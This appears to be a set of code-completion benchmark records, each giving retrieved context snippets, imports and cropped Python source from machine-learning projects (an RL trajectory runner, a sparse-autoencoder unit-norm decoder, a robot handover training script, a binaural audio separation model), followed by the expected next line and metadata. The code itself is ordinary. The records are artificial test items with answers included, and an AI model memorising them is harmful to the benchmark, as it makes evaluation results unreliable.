info_data.action_info\n return StepData(**step_data)\n\n def add(self, step_data=None, **kwargs):\n if len(self.data) < 1:\n self.allocate_memory(step_data, **kwargs)\n if self.cur_id == 0:\n self.list_data.clear()\n if step_data is not None:\n if not isinstance(step_data, StepData):\n raise TypeError('step_data should be an '\n 'instance of StepData!')\n sd = asdict(step_data)\n\n for key in self.data.keys():\n self._assign_value(key, sd[key], self.cur_id)\n self.list_data.append(step_data.get_info_data())\n else:\n for key in self.data.keys():\n if key in kwargs:\n val = kwargs.pop(key)\n if isinstance(val, dict):\n for kk, vv in val.items():\n kk = self.convert_dict_key(key, kk)\n self._assign_value(kk, vv, self.cur_id)\n else:\n self._assign_value(key, val, self.cur_id)\n if len(kwargs) > 0:\n info = InfoData(**kwargs)\n self.list_data.append(info)\n self.cur_id = int((self.cur_id + 1) % self.capacity)\n\n def _assign_value(self, key, val, cur_id):\n if isinstance(val, np.ndarray):\n val = torch.from_numpy(val)\n self.data[key][cur_id] = val.to(self.data[key].device, non_blocking=True)\n\n def reset(self):\n for key in self.data.keys():\n self.data[key].zero_()\n self.cur_id = 0\n self.list_data.clear()\n\n def add_extra(self, key, value):\n self.extra_data[key] = value\n\n @property\n def obs(self):\n obs = self.data.get('ob', None)\n return obs[:self.capacity]\n\n @property\n def states(self):\n states = self.data.get('state', None)\n return states[:self.capacity]\n\n @property\n def actions(self):\n actions = self.data.get('action', None)\n return actions[:self.capacity]\n\n @property\n def action_infos(self):\n return [data.action_info for idx, data in enumerate(self.list_data) if idx < self.capacity]\n\n @property\n def next_obs(self):\n next_obs = self.data.get('next_ob', None)\n return next_obs[:self.capacity]\n\n @property\n def next_states(self):\n next_states = 
self.data.get('next_state', None)\n return next_states[:self.capacity]\n\n @property\n def rewards(self):\n rewards = self.data.get('reward', None)\n return rewards[:self.capacity]\n\n @property\n def true_dones(self):\n true_dones = self.data.get('true_done', None)\n return true_dones[:self.capacity]\n\n @property\n def dones(self):\n dones = self.data.get('done', None)\n return dones[:self.capacity]\n\n @property\n def infos(self):\n return [data.info for idx, data in enumerate(self.list_data) if idx < self.capacity]\n\n @property\n def total_steps(self):\n return len(self.data['action'][0]) * self.capacity\n\n @property\n def num_envs(self):\n return len(self.data['action'][0])\n\n @property\n def done_indices(self):\n dids = []\n dones = torch_to_np(self.dones)\n for i in range(dones.shape[1]):\n di = dones[:, i]\n did = []\n if not np.any(di):\n did.append(len(di) - 1)\n else:\n did.extend(np.where(dones[:, i])[0])\n dids.append(did)\n return dids\n\n @property\n def episode_steps(self):\n steps = []\n dones = torch_to_np(self.dones)\n for i in range(dones.shape[1]):\n di = dones[:, i]\n if not np.any(di):\n steps.append(len(di))\n else:\n did = np.argwhere(di).flatten() + 1\n did = np.insert(did, 0, 0)\n diff = np.diff(did)\n steps.extend(diff.tolist())\n return steps"
},
{
"identifier": "TIMEOUT_KEY",
"path": "dexenv/utils/info_util.py",
"snippet": "TIMEOUT_KEY = 'TimeLimit.truncated'"
},
{
"identifier": "aggregate_traj_info",
"path": "dexenv/utils/info_util.py",
"snippet": "def aggregate_traj_info(infos, key, single_info=False):\n if single_info:\n infos = [infos]\n if isinstance(infos[0], Sequence):\n out = []\n for info in infos:\n time_out = []\n for env_info in info:\n time_out.append(env_info[key])\n out.append(np.stack(time_out))\n out = stack_data(out)\n elif isinstance(infos[0], dict):\n out = []\n for info in infos:\n tensor = info[key]\n out.append(tensor)\n out = stack_data(out)\n else:\n raise NotImplementedError\n if single_info:\n out = out.squeeze(0)\n return out"
},
{
"identifier": "info_has_key",
"path": "dexenv/utils/info_util.py",
"snippet": "def info_has_key(infos, key, single_info=False):\n if not single_info:\n infos = infos[0]\n if isinstance(infos, Sequence):\n return key in infos[0]\n elif isinstance(infos, dict):\n return key in infos\n else:\n raise NotImplementedError"
},
{
"identifier": "torch_to_np",
"path": "dexenv/utils/torch_utils.py",
"snippet": "def torch_to_np(tensor):\n if isinstance(tensor, np.ndarray):\n return tensor\n else:\n return tensor.cpu().detach().numpy()"
}
] | import numpy as np
import torch
from collections import deque
from dataclasses import dataclass
from omegaconf.dictconfig import DictConfig
from typing import Any
from dexenv.utils.common import stack_data
from dexenv.utils.data import TorchTrajectory
from dexenv.utils.info_util import TIMEOUT_KEY
from dexenv.utils.info_util import aggregate_traj_info
from dexenv.utils.info_util import info_has_key
from dexenv.utils.torch_utils import torch_to_np | 2,537 |
@dataclass
class BasicRunner:
agent: Any
env: Any
cfg: DictConfig
eval_env: Any = None
store_next_ob: bool = True
def __post_init__(self):
self.train_env = self.env
self.num_train_envs = self.env.num_envs
self.obs = None
if self.eval_env is None:
self.eval_env = self.env
self.train_ep_return = deque(maxlen=self.cfg.alg.deque_size)
self.train_ep_len = deque(maxlen=self.cfg.alg.deque_size)
self.train_success = deque(maxlen=self.cfg.alg.deque_size)
self.save_ob_in_eval = self.cfg.save_ob_in_eval
self.disable_tqdm = not self.cfg.alg.tqdm
self.reset_record()
def __call__(self, **kwargs):
raise NotImplementedError
def reset(self, env=None, *args, **kwargs):
if env is None:
env = self.train_env
self.obs = env.reset(*args, **kwargs)
self.reset_record()
def reset_record(self):
self.cur_ep_len = np.zeros(self.num_train_envs)
self.cur_ep_return = np.zeros(self.num_train_envs)
def create_traj(self, evaluation=False):
if evaluation:
capacity = self.cfg.alg.eval_rollout_steps
else:
capacity = self.cfg.alg.train_rollout_steps
return TorchTrajectory(capacity=capacity,
traj_keys_in_cpu=self.cfg.alg.traj_keys_in_cpu)
def handle_timeout(self, next_ob, done, reward, info, skip_record=False):
if info_has_key(info, TIMEOUT_KEY, single_info=True):
|
@dataclass
class BasicRunner:
agent: Any
env: Any
cfg: DictConfig
eval_env: Any = None
store_next_ob: bool = True
def __post_init__(self):
self.train_env = self.env
self.num_train_envs = self.env.num_envs
self.obs = None
if self.eval_env is None:
self.eval_env = self.env
self.train_ep_return = deque(maxlen=self.cfg.alg.deque_size)
self.train_ep_len = deque(maxlen=self.cfg.alg.deque_size)
self.train_success = deque(maxlen=self.cfg.alg.deque_size)
self.save_ob_in_eval = self.cfg.save_ob_in_eval
self.disable_tqdm = not self.cfg.alg.tqdm
self.reset_record()
def __call__(self, **kwargs):
raise NotImplementedError
def reset(self, env=None, *args, **kwargs):
if env is None:
env = self.train_env
self.obs = env.reset(*args, **kwargs)
self.reset_record()
def reset_record(self):
self.cur_ep_len = np.zeros(self.num_train_envs)
self.cur_ep_return = np.zeros(self.num_train_envs)
def create_traj(self, evaluation=False):
if evaluation:
capacity = self.cfg.alg.eval_rollout_steps
else:
capacity = self.cfg.alg.train_rollout_steps
return TorchTrajectory(capacity=capacity,
traj_keys_in_cpu=self.cfg.alg.traj_keys_in_cpu)
def handle_timeout(self, next_ob, done, reward, info, skip_record=False):
if info_has_key(info, TIMEOUT_KEY, single_info=True): | time_out = aggregate_traj_info(info, TIMEOUT_KEY, single_info=True) | 3 | 2023-10-25 17:22:41+00:00 | 4k |
ai-safety-foundation/sparse_autoencoder | sparse_autoencoder/autoencoder/components/unit_norm_decoder.py | [
{
"identifier": "ResetOptimizerParameterDetails",
"path": "sparse_autoencoder/autoencoder/types.py",
"snippet": "class ResetOptimizerParameterDetails(NamedTuple):\n \"\"\"Reset Optimizer Parameter Details.\n\n Details of a parameter that should be reset in the optimizer, when resetting\n it's corresponding dictionary vectors.\n \"\"\"\n\n parameter: Parameter\n \"\"\"Parameter to reset.\"\"\"\n\n axis: int\n \"\"\"Axis of the parameter to reset.\"\"\""
},
{
"identifier": "Axis",
"path": "sparse_autoencoder/tensor_types.py",
"snippet": "class Axis(LowercaseStrEnum):\n \"\"\"Tensor axis names.\n\n Used to annotate tensor types.\n\n Example:\n When used directly it prints a string:\n\n >>> print(Axis.INPUT_OUTPUT_FEATURE)\n input_output_feature\n\n The primary use is to annotate tensor types:\n\n >>> from jaxtyping import Float\n >>> from torch import Tensor\n >>> from typing import TypeAlias\n >>> batch: TypeAlias = Float[Tensor, Axis.names(Axis.BATCH, Axis.INPUT_OUTPUT_FEATURE)]\n >>> print(batch)\n <class 'jaxtyping.Float[Tensor, 'batch input_output_feature']'>\n\n You can also join multiple axis together to represent the dimensions of a tensor:\n\n >>> print(Axis.names(Axis.BATCH, Axis.INPUT_OUTPUT_FEATURE))\n batch input_output_feature\n \"\"\"\n\n # Component idx\n COMPONENT = auto()\n \"\"\"Component index.\"\"\"\n\n COMPONENT_OPTIONAL = \"*component\"\n \"\"\"Optional component index.\"\"\"\n\n # Batches\n SOURCE_DATA_BATCH = auto()\n \"\"\"Batch of prompts used to generate source model activations.\"\"\"\n\n BATCH = auto()\n \"\"\"Batch of items that the SAE is being trained on.\"\"\"\n\n STORE_BATCH = auto()\n \"\"\"Batch of items to be written to the store.\"\"\"\n\n ITEMS = auto()\n \"\"\"Arbitrary number of items.\"\"\"\n\n # Features\n INPUT_OUTPUT_FEATURE = auto()\n \"\"\"Input or output feature (e.g. feature in activation vector from source model).\"\"\"\n\n LEARNT_FEATURE = auto()\n \"\"\"Learn feature (e.g. feature in learnt activation vector).\"\"\"\n\n DEAD_FEATURE = auto()\n \"\"\"Dead feature.\"\"\"\n\n ALIVE_FEATURE = auto()\n \"\"\"Alive feature.\"\"\"\n\n # Feature indices\n INPUT_OUTPUT_FEATURE_IDX = auto()\n \"\"\"Input or output feature index.\"\"\"\n\n LEARNT_FEATURE_IDX = auto()\n \"\"\"Learn feature index.\"\"\"\n\n # Other\n POSITION = auto()\n \"\"\"Token position.\"\"\"\n\n SINGLE_ITEM = \"\"\n \"\"\"Single item axis.\"\"\"\n\n ANY = \"...\"\n \"\"\"Any number of axis.\"\"\"\n\n @staticmethod\n def names(*axis: \"Axis\") -> str:\n \"\"\"Join multiple axis together, to represent the dimensions of a tensor.\n\n Example:\n >>> print(Axis.names(Axis.BATCH, Axis.INPUT_OUTPUT_FEATURE))\n batch input_output_feature\n\n Args:\n *axis: Axis to join.\n\n Returns:\n Joined axis string.\n \"\"\"\n return \" \".join(a.value for a in axis)"
},
{
"identifier": "shape_with_optional_dimensions",
"path": "sparse_autoencoder/utils/tensor_shape.py",
"snippet": "def shape_with_optional_dimensions(*shape: int | None) -> tuple[int, ...]:\n \"\"\"Create a shape from a tuple of optional dimensions.\n\n Motivation:\n By default PyTorch tensor shapes will error if you set an axis to `None`. This allows\n you to set that size and then the resulting output simply removes that axis.\n\n Examples:\n >>> shape_with_optional_dimensions(1, 2, 3)\n (1, 2, 3)\n\n >>> shape_with_optional_dimensions(1, None, 3)\n (1, 3)\n\n >>> shape_with_optional_dimensions(1, None, None)\n (1,)\n\n >>> shape_with_optional_dimensions(None, None, None)\n ()\n\n Args:\n *shape: Axis sizes, with `None` representing an optional axis.\n\n Returns:\n Axis sizes.\n \"\"\"\n return tuple(dimension for dimension in shape if dimension is not None)"
}
] | from typing import final
from jaxtyping import Float, Int64
from pydantic import PositiveInt, validate_call
from torch import Tensor
from torch.nn import Module, Parameter, init
from sparse_autoencoder.autoencoder.types import ResetOptimizerParameterDetails
from sparse_autoencoder.tensor_types import Axis
from sparse_autoencoder.utils.tensor_shape import shape_with_optional_dimensions
import einops
import torch | 1,910 | """Linear layer with unit norm weights."""
@final
class UnitNormDecoder(Module):
r"""Constrained unit norm linear decoder layer.
Linear layer decoder, where the dictionary vectors (columns of the weight matrix) are
constrained to have unit norm. This is done by removing the gradient information parallel to the
dictionary vectors before applying the gradient step, using a backward hook. It also requires
`constrain_weights_unit_norm` to be called after each gradient step, to prevent drift of the
dictionary vectors away from unit norm (as optimisers such as Adam don't strictly follow the
gradient, but instead follow a modified gradient that includes momentum).
$$ \begin{align*}
m &= \text{learned features dimension} \\
n &= \text{input and output dimension} \\
b &= \text{batch items dimension} \\
f \in \mathbb{R}^{b \times m} &= \text{encoder output} \\
W_d \in \mathbb{R}^{n \times m} &= \text{weight matrix} \\
z \in \mathbb{R}^{b \times m} &= f W_d^T = \text{UnitNormDecoder output (pre-tied bias)}
\end{align*} $$
Motivation:
Normalisation of the columns (dictionary features) prevents the model from reducing the
sparsity loss term by increasing the size of the feature vectors in $W_d$.
Note that the *Towards Monosemanticity: Decomposing Language Models With Dictionary
Learning* paper found that removing the gradient information parallel to the dictionary
vectors before applying the gradient step, rather than resetting the dictionary vectors to
unit norm after each gradient step, results in a small but real reduction in total
loss](https://transformer-circuits.pub/2023/monosemantic-features/index.html#appendix-autoencoder-optimization).
"""
_learnt_features: int
"""Number of learnt features (inputs to this layer)."""
_decoded_features: int
"""Number of decoded features (outputs from this layer)."""
_n_components: int | None
weight: Float[
Parameter,
Axis.names(Axis.COMPONENT_OPTIONAL, Axis.INPUT_OUTPUT_FEATURE, Axis.LEARNT_FEATURE),
]
"""Weight parameter.
Each column in the weights matrix acts as a dictionary vector, representing a single basis
element in the learned activation space.
"""
@property
def reset_optimizer_parameter_details(self) -> list[ResetOptimizerParameterDetails]:
"""Reset optimizer parameter details.
Details of the parameters that should be reset in the optimizer, when resetting
dictionary vectors.
Returns:
List of tuples of the form `(parameter, axis)`, where `parameter` is the parameter to
reset (e.g. encoder.weight), and `axis` is the axis of the parameter to reset.
"""
return [ResetOptimizerParameterDetails(parameter=self.weight, axis=-1)]
@validate_call
def __init__(
self,
learnt_features: PositiveInt,
decoded_features: PositiveInt,
n_components: PositiveInt | None,
*,
enable_gradient_hook: bool = True,
) -> None:
"""Initialize the constrained unit norm linear layer.
Args:
learnt_features: Number of learnt features in the autoencoder.
decoded_features: Number of decoded (output) features in the autoencoder.
n_components: Number of source model components the SAE is trained on.
enable_gradient_hook: Enable the gradient backwards hook (modify the gradient before
applying the gradient step, to maintain unit norm of the dictionary vectors).
"""
super().__init__()
self._learnt_features = learnt_features
self._decoded_features = decoded_features
self._n_components = n_components
# Create the linear layer as per the standard PyTorch linear layer
self.weight = Parameter(
torch.empty(
| """Linear layer with unit norm weights."""
@final
class UnitNormDecoder(Module):
r"""Constrained unit norm linear decoder layer.
Linear layer decoder, where the dictionary vectors (columns of the weight matrix) are
constrained to have unit norm. This is done by removing the gradient information parallel to the
dictionary vectors before applying the gradient step, using a backward hook. It also requires
`constrain_weights_unit_norm` to be called after each gradient step, to prevent drift of the
dictionary vectors away from unit norm (as optimisers such as Adam don't strictly follow the
gradient, but instead follow a modified gradient that includes momentum).
$$ \begin{align*}
m &= \text{learned features dimension} \\
n &= \text{input and output dimension} \\
b &= \text{batch items dimension} \\
f \in \mathbb{R}^{b \times m} &= \text{encoder output} \\
W_d \in \mathbb{R}^{n \times m} &= \text{weight matrix} \\
z \in \mathbb{R}^{b \times m} &= f W_d^T = \text{UnitNormDecoder output (pre-tied bias)}
\end{align*} $$
Motivation:
Normalisation of the columns (dictionary features) prevents the model from reducing the
sparsity loss term by increasing the size of the feature vectors in $W_d$.
Note that the *Towards Monosemanticity: Decomposing Language Models With Dictionary
Learning* paper found that removing the gradient information parallel to the dictionary
vectors before applying the gradient step, rather than resetting the dictionary vectors to
unit norm after each gradient step, results in a small but real reduction in total
loss](https://transformer-circuits.pub/2023/monosemantic-features/index.html#appendix-autoencoder-optimization).
"""
_learnt_features: int
"""Number of learnt features (inputs to this layer)."""
_decoded_features: int
"""Number of decoded features (outputs from this layer)."""
_n_components: int | None
weight: Float[
Parameter,
Axis.names(Axis.COMPONENT_OPTIONAL, Axis.INPUT_OUTPUT_FEATURE, Axis.LEARNT_FEATURE),
]
"""Weight parameter.
Each column in the weights matrix acts as a dictionary vector, representing a single basis
element in the learned activation space.
"""
@property
def reset_optimizer_parameter_details(self) -> list[ResetOptimizerParameterDetails]:
"""Reset optimizer parameter details.
Details of the parameters that should be reset in the optimizer, when resetting
dictionary vectors.
Returns:
List of tuples of the form `(parameter, axis)`, where `parameter` is the parameter to
reset (e.g. encoder.weight), and `axis` is the axis of the parameter to reset.
"""
return [ResetOptimizerParameterDetails(parameter=self.weight, axis=-1)]
@validate_call
def __init__(
self,
learnt_features: PositiveInt,
decoded_features: PositiveInt,
n_components: PositiveInt | None,
*,
enable_gradient_hook: bool = True,
) -> None:
"""Initialize the constrained unit norm linear layer.
Args:
learnt_features: Number of learnt features in the autoencoder.
decoded_features: Number of decoded (output) features in the autoencoder.
n_components: Number of source model components the SAE is trained on.
enable_gradient_hook: Enable the gradient backwards hook (modify the gradient before
applying the gradient step, to maintain unit norm of the dictionary vectors).
"""
super().__init__()
self._learnt_features = learnt_features
self._decoded_features = decoded_features
self._n_components = n_components
# Create the linear layer as per the standard PyTorch linear layer
self.weight = Parameter(
torch.empty( | shape_with_optional_dimensions(n_components, decoded_features, learnt_features), | 2 | 2023-10-27 07:37:15+00:00 | 4k |
NVlabs/handover-sim2real | examples/train.py | [
{
"identifier": "get_cfg",
"path": "handover_sim2real/config.py",
"snippet": "def get_cfg(handover_config_only=False):\n if not handover_config_only:\n cfg = _C\n else:\n cfg = _C_handover_config\n return cfg.clone()"
},
{
"identifier": "HandoverSim2RealPolicy",
"path": "handover_sim2real/policy.py",
"snippet": "class HandoverSim2RealPolicy:\n def __init__(self, cfg, agent, grasp_agent, grasp_pred_threshold, use_ray=False, seed=None):\n self._cfg = cfg\n self._agent = agent\n self._grasp_agent = grasp_agent\n self._grasp_pred_threshold = grasp_pred_threshold\n self._use_ray = use_ray\n\n self._point_listener = PointListener(cfg, seed=seed)\n\n self._panda_base_invert_transform = pybullet.invertTransform(\n self._cfg.ENV.PANDA_BASE_POSITION, self._cfg.ENV.PANDA_BASE_ORIENTATION\n )\n\n self._steps_action_repeat = int(\n self._cfg.POLICY.TIME_ACTION_REPEAT / self._cfg.SIM.TIME_STEP\n )\n self._steps_close_gripper = int(\n self._cfg.POLICY.TIME_CLOSE_GRIPPER / self._cfg.SIM.TIME_STEP\n )\n self._standoff_offset = np.array([0.0, 0.0, 0.08])\n\n @property\n def steps_action_repeat(self):\n return self._steps_action_repeat\n\n def reset(self):\n self._done_frame = None\n self._grasp = None\n self._back = None\n\n self._point_listener.reset()\n\n def get_state(self, obs):\n point_states, elapsed_time = self._get_point_states_from_callback(obs)\n ee_pose = self._get_ee_pose(obs, in_panda_base=True)\n state = self._point_listener.point_states_to_state(point_states, ee_pose)\n return state, elapsed_time\n\n @timer\n def _get_point_states_from_callback(self, obs):\n point_states = obs[\"callback_get_point_states\"]()\n point_states = [point_state.T for point_state in point_states]\n return point_states\n\n def _get_ee_pose(self, obs, in_panda_base=False):\n pos = obs[\"panda_body\"].link_state[0, obs[\"panda_link_ind_hand\"], 0:3]\n orn = obs[\"panda_body\"].link_state[0, obs[\"panda_link_ind_hand\"], 3:7]\n if in_panda_base:\n pos, orn = pybullet.multiplyTransforms(*self._panda_base_invert_transform, pos, orn)\n ee_pose = unpack_pose(np.hstack((pos, tf_quat(orn))))\n return ee_pose\n\n def select_action(self, state, expert_policy=False):\n if self._use_ray:\n action, _, _, _ = ray.get(\n self._agent.select_action.remote(\n state, remain_timestep=1, expert_policy=expert_policy\n )\n )\n else:\n action, _, _, _ = self._agent.select_action(\n state, remain_timestep=1, expert_policy=expert_policy\n )\n return action\n\n def convert_action_to_target_joint_position(self, action, obs):\n ee_pose = self._get_ee_pose(obs)\n delta_ee_pose = unpack_action(action)\n target_ee_pose = np.matmul(ee_pose, delta_ee_pose)\n\n pos = target_ee_pose[:3, 3]\n orn = Rot.from_matrix(target_ee_pose[:3, :3]).as_quat()\n target_joint_position = pybullet.calculateInverseKinematics(\n obs[\"panda_body\"].contact_id[0], obs[\"panda_link_ind_hand\"] - 1, pos, orn\n )\n target_joint_position = np.array(target_joint_position)\n target_joint_position[7:9] = 0.04\n\n return target_joint_position\n\n def select_action_grasp(self, state):\n if self._use_ray:\n action = ray.get(\n self._grasp_agent.select_action_grasp.remote(state, self._grasp_pred_threshold)\n )\n else:\n action = self._grasp_agent.select_action_grasp(state, self._grasp_pred_threshold)\n return action\n\n def grasp_and_back(self, obs):\n if self._done_frame is None:\n self._done_frame = obs[\"frame\"]\n\n done = False\n\n if obs[\"frame\"] < self._done_frame + 4 * self._steps_action_repeat:\n if self._grasp is None:\n pos = obs[\"panda_body\"].link_state[0, obs[\"panda_link_ind_hand\"], 0:3].numpy()\n orn = obs[\"panda_body\"].link_state[0, obs[\"panda_link_ind_hand\"], 3:7].numpy()\n R = Rot.from_quat(orn).as_matrix()\n reach_goal = np.matmul(R, self._standoff_offset) + pos\n reach_traj = np.linspace(pos, reach_goal, 5)[1:]\n\n self._grasp = []\n for pos in 
reach_traj:\n conf = pybullet.calculateInverseKinematics(\n obs[\"panda_body\"].contact_id[0],\n obs[\"panda_link_ind_hand\"] - 1,\n pos,\n orn,\n )\n conf = np.array(conf)\n conf[7:9] = 0.04\n self._grasp.append(conf)\n\n i = (obs[\"frame\"] - self._done_frame) // self._steps_action_repeat\n action = self._grasp[i].copy()\n elif (\n obs[\"frame\"]\n < self._done_frame + 4 * self._steps_action_repeat + self._steps_close_gripper\n ):\n action = self._grasp[3].copy()\n action[7:9] = 0.0\n else:\n if self._back is None:\n self._back = []\n pos = obs[\"panda_body\"].link_state[0, obs[\"panda_link_ind_hand\"], 0:3].numpy()\n dpos_goal = self._cfg.BENCHMARK.GOAL_CENTER - pos\n dpos_step = dpos_goal / np.linalg.norm(dpos_goal) * self._cfg.POLICY.BACK_STEP_SIZE\n num_steps = int(\n np.ceil(np.linalg.norm(dpos_goal) / self._cfg.POLICY.BACK_STEP_SIZE)\n )\n for _ in range(num_steps):\n pos += dpos_step\n conf = pybullet.calculateInverseKinematics(\n obs[\"panda_body\"].contact_id[0], obs[\"panda_link_ind_hand\"] - 1, pos\n )\n conf = np.array(conf)\n conf[7:9] = 0.0\n self._back.append(conf)\n\n num_frames = (\n obs[\"frame\"]\n - self._done_frame\n - 4 * self._steps_action_repeat\n - self._steps_close_gripper\n )\n i = num_frames // self._steps_action_repeat\n i = min(i, len(self._back) - 1)\n action = self._back[i].copy()\n done = i == len(self._back) - 1\n\n return action, done"
},
{
"identifier": "add_sys_path_from_env",
"path": "handover_sim2real/utils.py",
"snippet": "def add_sys_path_from_env(name):\n assert name in os.environ, \"Environment variable '{}' is not set\".format(name)\n if os.environ[name] not in sys.path:\n sys.path.append(os.environ[name])"
}
] | import argparse
import gym
import itertools
import numpy as np
import os
import ray
from datetime import datetime
from handover.benchmark_wrapper import EpisodeStatus, HandoverBenchmarkWrapper
from handover_sim2real.config import get_cfg
from handover_sim2real.policy import HandoverSim2RealPolicy
from handover_sim2real.utils import add_sys_path_from_env
from experiments.config import cfg_from_file, save_cfg_to_file
from core.trainer import (
AgentWrapper,
AgentWrapperGPU05,
ReplayMemoryWrapper,
ReplayMemoryWrapperBase,
RolloutAgentWrapperGPU1,
Trainer,
TrainerRemote,
)
from core.utils import get_noise_delta, get_valid_index, rand_sample_joint | 2,315 | # Copyright (c) 2022-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the NVIDIA License [see LICENSE for details].
add_sys_path_from_env("GADDPG_DIR")
def parse_args():
parser = argparse.ArgumentParser(description="Train.")
parser.add_argument("--cfg-file", help="path to config file")
parser.add_argument("--seed", default=0, type=int, help="random seed")
parser.add_argument("--use-grasp-predictor", action="store_true", help="use grasp predictor")
parser.add_argument("--use-ray", action="store_true", help="use Ray")
parser.add_argument("--pretrained-dir", help="pretrained model directory")
parser.add_argument(
"opts",
nargs=argparse.REMAINDER,
help=(
"""modify config options at the end of the command; use space-separated """
""""PATH.KEY VALUE" pairs; see handover_sim2real/config.py, """
"""handover-sim/handover/config.py, and easysim/src/easysim/config.py for all options"""
),
)
args = parser.parse_args()
return args
class ActorWrapper:
def __init__(
self,
stage,
cfg,
use_ray,
rollout_agent,
expert_buffer,
online_buffer,
actor_seed,
grasp_agent,
grasp_pred_threshold,
):
self._stage = stage
self._cfg = cfg
self._use_ray = use_ray
self._expert_buffer = expert_buffer
self._online_buffer = online_buffer
self._use_grasp_predictor = grasp_agent is not None
self._env = HandoverBenchmarkWrapper(gym.make(self._cfg.ENV.ID, cfg=self._cfg))
| # Copyright (c) 2022-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the NVIDIA License [see LICENSE for details].
add_sys_path_from_env("GADDPG_DIR")
def parse_args():
parser = argparse.ArgumentParser(description="Train.")
parser.add_argument("--cfg-file", help="path to config file")
parser.add_argument("--seed", default=0, type=int, help="random seed")
parser.add_argument("--use-grasp-predictor", action="store_true", help="use grasp predictor")
parser.add_argument("--use-ray", action="store_true", help="use Ray")
parser.add_argument("--pretrained-dir", help="pretrained model directory")
parser.add_argument(
"opts",
nargs=argparse.REMAINDER,
help=(
"""modify config options at the end of the command; use space-separated """
""""PATH.KEY VALUE" pairs; see handover_sim2real/config.py, """
"""handover-sim/handover/config.py, and easysim/src/easysim/config.py for all options"""
),
)
args = parser.parse_args()
return args
class ActorWrapper:
def __init__(
self,
stage,
cfg,
use_ray,
rollout_agent,
expert_buffer,
online_buffer,
actor_seed,
grasp_agent,
grasp_pred_threshold,
):
self._stage = stage
self._cfg = cfg
self._use_ray = use_ray
self._expert_buffer = expert_buffer
self._online_buffer = online_buffer
self._use_grasp_predictor = grasp_agent is not None
self._env = HandoverBenchmarkWrapper(gym.make(self._cfg.ENV.ID, cfg=self._cfg)) | self._policy = HandoverSim2RealPolicy( | 1 | 2023-10-26 23:25:13+00:00 | 4k
vb000/SemanticHearing | src/training/dcc_tf_binaural.py | [
{
"identifier": "mod_pad",
"path": "src/training/dcc_tf.py",
"snippet": "def mod_pad(x, chunk_size, pad):\n # Mod pad the input to perform integer number of\n # inferences\n mod = 0\n if (x.shape[-1] % chunk_size) != 0:\n mod = chunk_size - (x.shape[-1] % chunk_size)\n\n x = F.pad(x, (0, mod))\n x = F.pad(x, pad)\n\n return x, mod"
},
{
"identifier": "MaskNet",
"path": "src/training/dcc_tf.py",
"snippet": "class MaskNet(nn.Module):\n def __init__(self, model_dim, num_enc_layers, dec_buf_len,\n dec_chunk_size, num_dec_layers, use_pos_enc, conditioning):\n super(MaskNet, self).__init__()\n\n # Encoder based on dilated causal convolutions.\n self.encoder = DilatedCausalConvEncoder(channels=model_dim,\n num_layers=num_enc_layers)\n\n # Transformer decoder that operates on chunks of size\n # buffer size.\n self.decoder = CausalTransformerDecoder(\n model_dim=model_dim, ctx_len=dec_buf_len, chunk_size=dec_chunk_size,\n num_layers=num_dec_layers, nhead=8, use_pos_enc=use_pos_enc,\n ff_dim=2 * model_dim, conditioning=conditioning)\n\n def forward(self, x, l, enc_buf, dec_buf):\n \"\"\"\n Generates a mask based on encoded input `e` and the one-hot\n label `label`.\n\n Args:\n x: [B, C, T]\n Input audio sequence\n l: [B, C]\n Label embedding\n ctx_buf: {[B, C, <receptive field of the layer>], ...}\n List of context buffers maintained by DCC encoder\n \"\"\"\n # Enocder the label integrated input\n e, enc_buf = self.encoder(x, enc_buf)\n\n # Decoder conditioned on embedding\n m, dec_buf = self.decoder(input=e, embedding=l, ctx_buf=dec_buf)\n\n return m, enc_buf, dec_buf"
},
{
"identifier": "itd_diff",
"path": "src/helpers/eval_utils.py",
"snippet": "def itd_diff(s_est, s_gt, sr):\n \"\"\"\n Computes the ITD error between model estimate and ground truth\n input: (*, 2, T), (*, 2, T)\n \"\"\"\n TMAX = int(round(1e-3 * sr))\n itd_est = compute_itd(s_est[..., 0, :], s_est[..., 1, :], sr, TMAX)\n itd_gt = compute_itd(s_gt[..., 0, :], s_gt[..., 1, :], sr, TMAX)\n return np.abs(itd_est - itd_gt)"
},
{
"identifier": "ild_diff",
"path": "src/helpers/eval_utils.py",
"snippet": "def ild_diff(s_est, s_gt):\n \"\"\"\n Computes the ILD error between model estimate and ground truth\n input: (*, 2, T), (*, 2, T)\n \"\"\"\n ild_est = compute_ild(s_est[..., 0, :], s_est[..., 1, :])\n ild_gt = compute_ild(s_gt[..., 0, :], s_gt[..., 1, :])\n return np.abs(ild_est - ild_gt)"
}
] | import os
import math
import logging
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchaudio
from collections import OrderedDict
from typing import Optional
from copy import deepcopy
from torch import Tensor
from torchmetrics.functional import(
scale_invariant_signal_noise_ratio as si_snr,
signal_noise_ratio as snr,
signal_distortion_ratio as sdr,
scale_invariant_signal_distortion_ratio as si_sdr)
from src.training.dcc_tf import mod_pad, MaskNet
from src.helpers.eval_utils import itd_diff, ild_diff | 2,293 | padding=out_buf_len * L, bias=False),
nn.Tanh())
if pretrained_path is not None:
state_dict = torch.load(pretrained_path)['model_state_dict']
# Load all the layers except label_embedding and freeze them
for name, param in self.named_parameters():
if 'label_embedding' not in name:
param.data = state_dict[name]
param.requires_grad = False
def init_buffers(self, batch_size, device):
enc_buf = self.mask_gen.encoder.init_ctx_buf(batch_size, device)
dec_buf = self.mask_gen.decoder.init_ctx_buf(batch_size, device)
out_buf = torch.zeros(batch_size, self.model_dim, self.out_buf_len,
device=device)
return enc_buf, dec_buf, out_buf
def predict(self, x, label, enc_buf, dec_buf, out_buf):
# Generate latent space representation of the input
x = self.in_conv(x)
# Generate label embedding
l = self.label_embedding(label) # [B, label_len] --> [B, channels]
l = l.unsqueeze(1).unsqueeze(-1) # [B, 1, channels, 1]
# Generate mask corresponding to the label
m, enc_buf, dec_buf = self.mask_gen(x, l, enc_buf, dec_buf)
# Apply mask and decode
x = x * m
x = torch.cat((out_buf, x), dim=-1)
out_buf = x[..., -self.out_buf_len:]
x = self.out_conv(x)
return x, enc_buf, dec_buf, out_buf
def forward(self, inputs, init_enc_buf=None, init_dec_buf=None,
init_out_buf=None, pad=True, writer=None, step=None, idx=None):
"""
Extracts the audio corresponding to the `label` in the given
`mixture`. Generates `chunk_size` samples per iteration.
Args:
mixed: [B, n_mics, T]
input audio mixture
label: [B, num_labels]
one hot label
Returns:
out: [B, n_spk, T]
